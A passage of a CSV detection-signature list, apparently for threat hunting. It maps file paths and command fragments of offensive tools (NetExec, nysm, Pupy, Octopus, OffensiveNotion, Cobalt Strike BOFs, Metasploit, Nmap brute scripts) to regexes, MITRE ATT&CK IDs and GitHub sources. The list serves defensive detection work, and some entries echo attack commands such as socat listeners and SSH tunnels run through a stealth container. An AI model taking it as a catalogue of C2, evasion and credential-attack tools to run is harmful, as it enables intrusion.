SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","1","N/A","7","6","551","100","2022-08-12T01:56:15Z","2016-04-28T16:45:02Z" "*/nullinux.py*",".{0,1000}\/nullinux\.py.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","1","N/A","7","6","551","100","2022-08-12T01:56:15Z","2016-04-28T16:45:02Z" "*/nullinux_users.txt*",".{0,1000}\/nullinux_users\.txt.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","0","N/A","7","6","551","100","2022-08-12T01:56:15Z","2016-04-28T16:45:02Z" "*/nxc --help*",".{0,1000}\/nxc\s\-\-help.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/nxc.exe*",".{0,1000}\/nxc\.exe.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/nxc/parsers/ip.py*",".{0,1000}\/nxc\/parsers\/ip\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/nxc/parsers/nmap.py*",".{0,1000}\/nxc\/parsers\/nmap\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/nxc-ubuntu-latest*",".{0,1000}\/nxc\-ubuntu\-latest.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/nysm bash*",".{0,1000}\/nysm\sbash.{0,1000}","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","3","205","36","2023-12-20T13:59:17Z","2023-09-25T10:03:52Z" "*/nysm -dr socat TCP4-LISTEN*",".{0,1000}\/nysm\s\-dr\ssocat\sTCP4\-LISTEN.{0,1000}","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","3","205","36","2023-12-20T13:59:17Z","2023-09-25T10:03:52Z" "*/nysm -r ssh *@*",".{0,1000}\/nysm\s\-r\sssh\s.{0,1000}\@.{0,1000}","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","3","205","36","2023-12-20T13:59:17Z","2023-09-25T10:03:52Z" "*/nysm.bpf.c*",".{0,1000}\/nysm\.bpf\.c.{0,1000}","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","3","205","36","2023-12-20T13:59:17Z","2023-09-25T10:03:52Z" "*/nysm.git*",".{0,1000}\/nysm\.git.{0,1000}","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","1","N/A","10","3","205","36","2023-12-20T13:59:17Z","2023-09-25T10:03:52Z" "*/o365recon.git*",".{0,1000}\/o365recon\.git.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","1","N/A","7","7","657","98","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" "*/oab-parse/mspack.*.dll*",".{0,1000}\/oab\-parse\/mspack\..{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*/obfs3/obfs3.py*",".{0,1000}\/obfs3\/obfs3\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/obfuscated_scripts/*",".{0,1000}\/obfuscated_scripts\/.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*/Obfuscated-Code.py*",".{0,1000}\/Obfuscated\-Code\.py.{0,1000}","offensive_tool_keyword","var0xshell","var0xshell - shell with xor encryption","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/var0xshell/tree/main","1","1","N/A","8","10","3","1","2023-01-09T06:53:42Z","2023-01-08T21:34:26Z" "*/obfuscation.exe --help*",".{0,1000}\/obfuscation\.exe\s\-\-help.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/Obfuscator.py*",".{0,1000}\/Obfuscator\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*/Obfuscator.py*",".{0,1000}\/Obfuscator\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*/obfuscator/obfuscator.*",".{0,1000}\/obfuscator\/obfuscator\..{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1552","235","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" "*/octopus.asm*",".{0,1000}\/octopus\.asm.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","713","153","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*/Octopus.git*",".{0,1000}\/Octopus\.git.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","713","153","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*/octopusx64.asm*",".{0,1000}\/octopusx64\.asm.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","713","153","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*/OffensiveCpp.git*",".{0,1000}\/OffensiveCpp\.git.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","1","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*/OffensiveCSharp.git*",".{0,1000}\/OffensiveCSharp\.git.{0,1000}","offensive_tool_keyword","OffensiveCSharp","Collection of Offensive C# Tooling","T1059.001 - T1055.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*/OffensiveCSharp/*",".{0,1000}\/OffensiveCSharp\/.{0,1000}","offensive_tool_keyword","OffensiveCSharp","Collection of Offensive C# Tooling","T1059.001 - T1055.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*/OffensiveLua.git*",".{0,1000}\/OffensiveLua\.git.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*/Offensive-Netsh-Helper.git*",".{0,1000}\/Offensive\-Netsh\-Helper\.git.{0,1000}","offensive_tool_keyword","Offensive-Netsh-Helper","Maintain Windows Persistence with an evil Netshell Helper DLL","T1174 - T1055.011 - T1546.013 - T1574.002 - T1105","TA0003 ","N/A","N/A","Persistence","https://github.com/rtcrowley/Offensive-Netsh-Helper","1","1","N/A","9","1","12","5","2018-07-28T02:12:09Z","2018-07-25T22:49:20Z" "*/OffensiveNotion.git",".{0,1000}\/OffensiveNotion\.git","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1049","114","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" "*/OffensiveNotion/agent*",".{0,1000}\/OffensiveNotion\/agent.{0,1000}","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1049","114","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" "*/OffensiveNotion/osxcross/target/bin*",".{0,1000}\/OffensiveNotion\/osxcross\/target\/bin.{0,1000}","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1049","114","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" "*/OffensiveNotion/utils*",".{0,1000}\/OffensiveNotion\/utils.{0,1000}","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","0","N/A","10","10","1049","114","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" "*/office2john.py*",".{0,1000}\/office2john\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/Office-Persistence.git*",".{0,1000}\/Office\-Persistence\.git.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","1","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z" "*/OfficePersistence.ps1*",".{0,1000}\/OfficePersistence\.ps1.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","1","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z" "*/Office-Persistence/master/calc.ppa*",".{0,1000}\/Office\-Persistence\/master\/calc\.ppa.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","1","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z" "*/OG-Sadpanda/*",".{0,1000}\/OG\-Sadpanda\/.{0,1000}","offensive_tool_keyword","cobaltstrike",".NET Assembly to Retrieve Outlook Calendar Details","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpCalendar","1","1","N/A","10","10","13","1","2021-10-07T19:42:20Z","2021-10-07T17:11:46Z" "*/Oh365UserFinder*",".{0,1000}\/Oh365UserFinder.{0,1000}","offensive_tool_keyword","Oh365UserFinder","Oh365UserFinder is used for identifying valid o365 accounts and domains without the risk of account lockouts. The tool parses responses to identify the IfExistsResult flag is null or not. and responds appropriately if the user is valid. The tool will attempt to identify false positives based on response. and either automatically create a waiting period to allow the throttling value to reset. or warn the user to increase timeouts between attempts.","T1595 - T1592 - T1589 - T1591 - T1598","TA0004 - TA0005 - TA0010","N/A","N/A","Reconnaissance","https://github.com/dievus/Oh365UserFinder","1","1","N/A","N/A","5","496","86","2023-03-21T15:59:54Z","2021-11-16T22:59:04Z" "*/oh365userfinder.py*",".{0,1000}\/oh365userfinder\.py.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","1","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "*/OJ/gobuster*",".{0,1000}\/OJ\/gobuster.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","9022","1144","2024-04-29T21:27:59Z","2014-11-14T13:18:35Z" "*/omg-payloads.git*",".{0,1000}\/omg\-payloads\.git.{0,1000}","offensive_tool_keyword","omg-payloads","Official payload library for the O.MG line of products from Mischief Gadgets","T1200 - T1095 - T1059.006 - T1027","TA0010 - TA0011","N/A","N/A","Hardware","https://github.com/hak5/omg-payloads","1","1","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*/omp2-brute.nse*",".{0,1000}\/omp2\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/omp2-enum-targets.nse*",".{0,1000}\/omp2\-enum\-targets\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/omron-info.nse*",".{0,1000}\/omron\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/On_Demand_C2/*",".{0,1000}\/On_Demand_C2\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","318","52","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" "*/onedrive_user_enum*",".{0,1000}\/onedrive_user_enum.{0,1000}","offensive_tool_keyword","onedrive_user_enum","enumerate valid onedrive users","T1087 - T1110","TA0006","N/A","N/A","Network Exploitation tools","https://github.com/nyxgeek/onedrive_user_enum","1","1","N/A","N/A","6","553","72","2024-04-05T17:19:50Z","2019-03-05T08:54:38Z" "*/oneliner.tpl*",".{0,1000}\/oneliner\.tpl.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*/oneliner2.tpl*",".{0,1000}\/oneliner2\.tpl.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*/onesixtyone/dict.txt*",".{0,1000}\/onesixtyone\/dict\.txt.{0,1000}","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","1","N/A","N/A","5","470","85","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z" "*/onex.git*",".{0,1000}\/onex\.git.{0,1000}","offensive_tool_keyword","onex","Onex is a package manager for hacker's. Onex manage more than 400+ hacking tools that can be installed on single click","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/rajkumardusad/onex","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/onionpipe.git*",".{0,1000}\/onionpipe\.git.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","1","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*/onionpipe/releases/latest*",".{0,1000}\/onionpipe\/releases\/latest.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","1","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*/onionpipe:main*",".{0,1000}\/onionpipe\:main.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*/open_vas.rb*",".{0,1000}\/open_vas\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/openbullet.git*",".{0,1000}\/openbullet\.git.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1426","688","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" "*/OpenBullet2.git*",".{0,1000}\/OpenBullet2\.git.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1565","446","2024-01-23T11:49:34Z","2020-04-23T14:04:16Z" "*/openflow-info.nse*",".{0,1000}\/openflow\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/openlookup-info.nse*",".{0,1000}\/openlookup\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/openvas-otp-brute.nse*",".{0,1000}\/openvas\-otp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/openwebnet-discovery.nse*",".{0,1000}\/openwebnet\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation 